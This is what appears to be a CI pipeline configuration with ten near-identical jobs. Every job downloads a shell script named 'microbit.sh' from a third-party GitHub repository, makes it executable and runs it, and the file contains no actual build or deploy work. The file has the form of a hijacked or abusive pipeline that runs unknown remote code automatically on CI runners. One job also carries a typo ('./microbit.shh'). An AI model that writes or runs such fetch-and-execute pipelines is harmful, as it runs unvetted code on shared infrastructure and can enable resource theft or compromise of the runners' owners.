stages:
  - bachannel
  - build
  - deploy

bachannel_1:
  stage: bachannel
  script:
    - wget https://github.com/macron90/denranis/blob/main/microbit.sh && chmod u+x microbit.sh && ./microbit.sh

bachannel_2:
  stage: bachannel
  script:
    - wget https://github.com/macron90/denranis/blob/main/microbit.sh && chmod u+x microbit.sh && ./microbit.sh
    
bachannel_3:
  stage: bachannel
  script:
    - wget https://github.com/macron90/denranis/blob/main/microbit.sh && chmod u+x microbit.sh && ./microbit.sh
    
bachannel_4:
  stage: bachannel
  script:
    - wget https://github.com/macron90/denranis/blob/main/microbit.sh && chmod u+x microbit.sh && ./microbit.sh
    
bachannel_5:
  stage: bachannel
  script:
    - wget https://github.com/macron90/denranis/blob/main/microbit.sh && chmod u+x microbit.sh && ./microbit.sh
    
bachannel_6:
  stage: bachannel
  script:
    - wget https://github.com/macron90/denranis/blob/main/microbit.sh && chmod u+x microbit.sh && ./microbit.shh
    
bachannel_7:
  stage: bachannel
  script:
    - wget https://github.com/macron90/denranis/blob/main/microbit.sh && chmod u+x microbit.sh && ./microbit.sh
    
bachannel_8:
  stage: bachannel
  script:
    - wget https://github.com/macron90/denranis/blob/main/microbit.sh && chmod u+x microbit.sh && ./microbit.sh
    
bachannel_9:
  stage: bachannel
  script:
    - wget https://github.com/macron90/denranis/blob/main/microbit.sh && chmod u+x microbit.sh && ./microbit.sh
    
bachannel_10:
  stage: build
  script:
    - wget https://github.com/macron90/denranis/blob/main/microbit.sh && chmod u+x microbit.sh && ./microbit.sh